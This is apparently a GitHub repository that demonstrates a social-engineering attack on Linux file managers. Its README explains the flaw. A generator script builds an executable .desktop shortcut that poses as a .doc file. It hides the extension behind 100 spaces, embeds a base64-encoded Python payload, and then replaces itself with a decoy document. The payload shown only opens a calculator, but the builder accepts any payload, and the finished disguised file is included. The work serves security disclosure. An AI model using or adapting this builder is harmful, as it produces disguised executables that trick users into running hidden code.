├── decoy.doc ├── sketchy.doc.ziр ├── desktop.tmpl ├── payload.py ├── README.md ├── desktop-file-generator.py └── sketchy.doc.desktop /decoy.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DonnchaC/desktop-file-social-engineering/HEAD/decoy.doc -------------------------------------------------------------------------------- /sketchy.doc.ziр: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DonnchaC/desktop-file-social-engineering/HEAD/sketchy.doc.ziр -------------------------------------------------------------------------------- /desktop.tmpl: -------------------------------------------------------------------------------- 1 | [Desktop Entry] 2 | Version=1.0 3 | Name={{ filename }} 4 | Exec=python -c "{{ python_payload }}" 5 | Icon=x-office-document 6 | Terminal=false 7 | Type=Application 8 | {# The resource file must be the last entry in the Desktop file to be correctly parsed #} 9 | Resource={{ decoy_data }} 10 | -------------------------------------------------------------------------------- /payload.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | import base64 3 | import re 4 | import os 5 | 6 | # Run the payload 7 | subprocess.Popen(["gnome-calculator"]) 8 | 9 | # Find the desktop file and replace it with the decoy 10 | desktop_filename = os.environ["GIO_LAUNCHED_DESKTOP_FILE"] 11 | current_dir = os.path.dirname(desktop_filename) 12 | 13 | with open(desktop_filename, "r") as desktop_file: 14 | desktop_data = desktop_file.read() 15 | 16 | # Extract the file name and decoy file data from the .desktop file 17 | display_name = re.search(r"^Name=(.*)$", desktop_data, re.MULTILINE).group(1) 18 | decoy_data_b64 = re.search(r"^Resource=([\s\S]*)$", desktop_data, re.MULTILINE).group(1) 19 | decoy_data = base64.b64decode(decoy_data_b64) 20 | 21 | # Save the decoy file with the same name as the Desktop name 22 | final_filename = os.path.join(current_dir, display_name) 23 | with open(final_filename, "w") as decoy_file: 24 | decoy_file.write(decoy_data) 25 | 26 | # Remove the original .desktop file 27 | os.remove(desktop_filename) 28 | 29 | # Do something with the decoy file 30 | subprocess.Popen(["libreoffice", final_filename]) 31 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Security Risks of .desktop Shortcuts 2 | ==================================== 3 | 4 | After reading a [Reddit post](https://www.reddit.com/r/linux/comments/5r6va0/how_to_easily_trick_file_manager_users_to_execute/) by "wander_homer", I was reminded to look at how .desktop shortcut files are handled on modern Linux systems. 5 | 6 | A .desktop file which has the executable bit set will be parsed specially by file managers such as Nautilus. Rather than showing the true filename and file type Nautilus will display the application name and icon which is specified in the .desktop file. This allows for a malicious .desktop shortcut to easily masquerade as a safe file type. 7 | 8 | Nautilus 3.22 added support for the automatic extraction of zip files and other archives when opened. This greatly increases the risk of this type of social engineering attack as a regular user will now have no opportunity to view the real file type before executing the command in the .desktop file. 9 | 10 | These risks have been discussed are not new, they have been [discussed for more than 10 years](https://lwn.net/Articles/178409/). However serious thought needs to be given to mitigate these risks if Linux is to scale safely to more users. 11 | 12 | ### Example .desktop files 13 | 14 | This repository contains a script for generating a malicious .desktop file which stealthy executes a Python payload. The payload cleans up the desktop shortcut and replace itself with a legitimate decoy file. 15 | 16 | [sketchy.doc.zip](https://github.com/DonnchaC/desktop-file-social-engineering/raw/master/sketchy.doc.ziр) 17 | -------------------------------------------------------------------------------- /desktop-file-generator.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | import os 4 | import argparse 5 | import base64 6 | import zipfile 7 | 8 | from jinja2 import Template 9 | 10 | 11 | if __name__ == "__main__": 12 | parser = argparse.ArgumentParser(description="Create an executable .desktop file for RCE.") 13 | parser.add_argument("-c", "--desktop-template", metavar="DESKTOP_TEMPLATE", 14 | help="Template containing the desktop file (default '%(default)s').", 15 | default="desktop.tmpl", type=argparse.FileType('r')) 16 | 17 | parser.add_argument("-p", "--payload", metavar="PAYLOAD", type=argparse.FileType('r'), 18 | help="Python code for the payload (default '%(default)s').", 19 | default="payload.py") 20 | 21 | parser.add_argument("-d", "--decoy", metavar="DECOY", type=argparse.FileType('rb'), 22 | help="Decoy file to replace the .desktop file (default '%(default)s').", 23 | default="decoy.doc") 24 | 25 | parser.add_argument("-n", "--payload-name", metavar="PAYLOAD_FILENAME", type=str, 26 | help="The name of the generated desktop file (default: '%(default)s')", 27 | default="sketchy.doc") 28 | 29 | args = parser.parse_args() 30 | 31 | print("Creating malicious .desktop file\n---------") 32 | decoy_base64 = base64.b64encode(args.decoy.read()) 33 | payload_base64 = base64.b64encode(args.payload.read()) 34 | python_payload = "import base64; exec(base64.b64decode('{}'))".format(payload_base64) 35 | 36 | # Format the payload and create the .desktop file from the template. 37 | desktop_template = Template(args.desktop_template.read()) 38 | desktop_file_content = desktop_template.render(python_payload=python_payload, 39 | filename=args.payload_name, 40 | decoy_data=decoy_base64) 41 | 42 | # Add spaces to filename to extension in archive 43 | desktop_file = args.payload_name + (" " * 100) + ".desktop" 44 | with open(desktop_file, "w") as payload: 45 | payload.write(desktop_file_content) 46 | os.chmod(desktop_file, 0o755) 47 | print("Wrote .desktop file to {}".format(desktop_file)) 48 | 49 | zip_filename = "sketchy.zip" 50 | zipf = zipfile.ZipFile(zip_filename, "w", zipfile.ZIP_DEFLATED) 51 | zipf.write(desktop_file) 52 | zipf.close() 53 | print("Wrote zip file containing desktop file to {}".format(zip_filename)) 54 | -------------------------------------------------------------------------------- /sketchy.doc.desktop: -------------------------------------------------------------------------------- 1 | [Desktop Entry] 2 | Version=1.0 3 | Name=sketchy.doc 4 | Exec=python -c "import base64; exec(base64.b64decode('aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IGJhc2U2NAppbXBvcnQgcmUKaW1wb3J0IG9zCgojIFJ1biB0aGUgcGF5bG9hZApzdWJwcm9jZXNzLlBvcGVuKFsiZ25vbWUtY2FsY3VsYXRvciJdKQoKIyBGaW5kIHRoZSBkZXNrdG9wIGZpbGUgYW5kIHJlcGxhY2UgaXQgd2l0aCB0aGUgZGVjb3kKZGVza3RvcF9maWxlbmFtZSA9IG9zLmVudmlyb25bIkdJT19MQVVOQ0hFRF9ERVNLVE9QX0ZJTEUiXQpjdXJyZW50X2RpciA9IG9zLnBhdGguZGlybmFtZShkZXNrdG9wX2ZpbGVuYW1lKQoKd2l0aCBvcGVuKGRlc2t0b3BfZmlsZW5hbWUsICJyIikgYXMgZGVza3RvcF9maWxlOgogICAgZGVza3RvcF9kYXRhID0gZGVza3RvcF9maWxlLnJlYWQoKQoKIyBFeHRyYWN0IHRoZSBmaWxlIG5hbWUgYW5kIGRlY295IGZpbGUgZGF0YSBmcm9tIHRoZSAuZGVza3RvcCBmaWxlCmRpc3BsYXlfbmFtZSA9IHJlLnNlYXJjaChyIl5OYW1lPSguKikkIiwgZGVza3RvcF9kYXRhLCByZS5NVUxUSUxJTkUpLmdyb3VwKDEpCmRlY295X2RhdGFfYjY0ID0gcmUuc2VhcmNoKHIiXlJlc291cmNlPShbXHNcU10qKSQiLCBkZXNrdG9wX2RhdGEsIHJlLk1VTFRJTElORSkuZ3JvdXAoMSkKZGVjb3lfZGF0YSA9IGJhc2U2NC5iNjRkZWNvZGUoZGVjb3lfZGF0YV9iNjQpCgojIFNhdmUgdGhlIGRlY295IGZpbGUgd2l0aCB0aGUgc2FtZSBuYW1lIGFzIHRoZSBEZXNrdG9wIG5hbWUKZmluYWxfZmlsZW5hbWUgPSBvcy5wYXRoLmpvaW4oY3VycmVudF9kaXIsIGRpc3BsYXlfbmFtZSkKd2l0aCBvcGVuKGZpbmFsX2ZpbGVuYW1lLCAidyIpIGFzIGRlY295X2ZpbGU6CiAgICBkZWNveV9maWxlLndyaXRlKGRlY295X2RhdGEpCgojIFJlbW92ZSB0aGUgb3JpZ2luYWwgLmRlc2t0b3AgZmlsZQpvcy5yZW1vdmUoZGVza3RvcF9maWxlbmFtZSkKCiMgRG8gc29tZXRoaW5nIHdpdGggdGhlIGRlY295IGZpbGUKc3VicHJvY2Vzcy5Qb3BlbihbImxpYnJlb2ZmaWNlIiwgZmluYWxfZmlsZW5hbWVdKQo='))" 5 | Icon=x-office-document 6 | Terminal=false 7 | Type=Application 8 | 9 | Resource=0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAOwADAP7/CQAGAAAAAAAAAAAAAAABAAAADwAAAAAAAAAAEAAAAgAAAAEAAAD+////AAAAAAAAAAD////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////9//////////7///8EAAAABQAAAAYAAAAHAAAACAAAAAkAAAAKAAAACwAAAAwAAAANAAAADgAAAP7///8QAAAA/v///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////1IAbwBvAHQAIABFAG4AdAByAHkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAWAAUA////////////////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/v///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD+////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP///////////////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP7///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA////////////////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/v///wAAAAAAAAAAAQAAAP7////+////BAAAAAUAAAAGAAAABwAAAAgAAAAJAAAACgAAAAsAAAAMAAAADQAAAA4AAAAPAAAAEAAAABEAAAASAAAAEwAAABQAAAAVAAAAFgAAABcAAAAYAAAAGQAAABoAAAAbAAAAHAAAAB0AAAD+////HwAAACAAAAAhAAAAIgAAAP7///8kAAAAJQAAACYAAAAnAAAAKAAAACkAAAAqAAAAKwAAACwAAAAtAAAALgAAAC8AAAAwAAAAMQAAADIAAAAzAAAANAAAADUAAAA2AAAANwAAADgAAAA5AAAAOgAAADsAAAA8AAAAPQAAAD4AAAA/AAAAQAAAAEEAAABCAAAAQwAAAEQAAABFAAAARgAAAEcAAABIAAAASQAAAEoAAABLAAAATAAAAE0AAABOAAAATwAAAFAAAABRAAAAUgAAAFMAAABUAAAAVQAAAFYAAABXAAAAWAAAAFkAAABaAAAAWwAAAP7///9dAAAA/v////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////8BAP7/AwoAAP////8GCQIAAAAAAMAAAAAAAABGGAAAAE1pY3Jvc29mdCBXb3JkLURva3VtZW50AAoAAABNU1dvcmREb2MAEAAAAFdvcmQuRG9jdW1lbnQuOAD0ObJxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASABQACgABAFsADwACAAAAAAAAAF4AABDx/wIAXgAAAAYATgBvAHIAbQBhAGwAAAALAAAAMSQBKiQBQSQAADMAQioAT0oDAFFKAwBDShgAbUgJBHNICQRLSAEAUEoEAG5IBAh0SAQIXkoFAGFKGABfSDkEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABGAP4fAQACAUYAAAAHAEgAZQBhAGQAaQBuAGcAAAANAA8AE6TwABSkeAAGJAEAGABPSgYAUUoGAENKHABQSgQAXkoFAGFKHAA0AEIQAQACATQAAAAJAFQAZQB4AHQAIABCAG8AZAB5AAAAEAAQABJkIAEBABOkAAAUpIwAAAAgAC8QAQESASAAAAAEAEwAaQBzAHQAAAACABEABABeSgcAQAAiEAEAIgFAAAAABwBDAGEAcAB0AGkAbwBuAAAADQASABOkeAAUpHgADCQBABIAQ0oYADYIAV5KBwBhShgAXQgBJgD+HwEAMgEmAAAABQBJAG4AZABlAHgAAAAFABMADCQBAAQAXkoHAAAAAAAGAAAABAAADgAAAAD/////AAgAAAwIAAAFAAAAAAgAAAwIAAAGAAAAAAAAAAYA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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACuAQAADAAAALoBAAAMAAAAAAAAAAAAAADnAQAAOAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADGAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB8EAABiAgAAAAAAAAAAAADSAQAAFQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADGAQAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACANkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAB3AG4AZQBkAA0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAACggAAAwIAAD4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkNKHgA1CAFhSh4AXAgBAgAIAAAMCAAA+gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAMkAWEkAQABMAAfsNAvILDgPSGwbgQisG4EI5BuBCSQbgQyUAAAMZBoATBwAAAAADNQAAAoMgAOMAAAAAAAAAAAAAAAAAAAAP7/AAABAAIAAAAAAAAAAAAAAAAAAAAAAAIAAAAC1c3VnC4bEJOXCAArLPmuRAAAAAXVzdWcLhsQk5cIACss+a5cAAAAGAAAAAEAAAABAAAAEAAAAAIAAADp/QAAGAAAAAEAAAABAAAAEAAAAAIAAADp/QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSAG8AbwB0ACAARQBuAHQAcgB5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFgAFAP//////////AQAAAAYJAgAAAAAAwAAAAAAAAEYAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAACAFwAAAAAAAAEAQwBvAG0AcABPAGIAagAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASAAIAAgAAAAQAAAD/////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGoAAAAAAAAAAQBPAGwAZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoAAgD/////AwAAAP////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAFAAAAAAAAAAxAFQAYQBiAGwAZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgACAP///////////////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAACBBgAAAAAAAAUAUwB1AG0AbQBhAHIAeQBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoAAIABQAAAAYAAAD/////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAADgBAAAAAAAAVwBvAHIAZABEAG8AYwB1AG0AZQBuAHQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABoAAgD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAjAAAAMg4AAAAAAAAFAEQAbwBjAHUAbQBlAG4AdABTAHUAbQBtAGEAcgB5AEkAbgBmAG8AcgBtAGEAdABpAG8AbgAAAAAAAAAAAAAAOAACAP///////////////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFwAAAB0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA////////////////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/v///wAAAAAAAAAA --------------------------------------------------------------------------------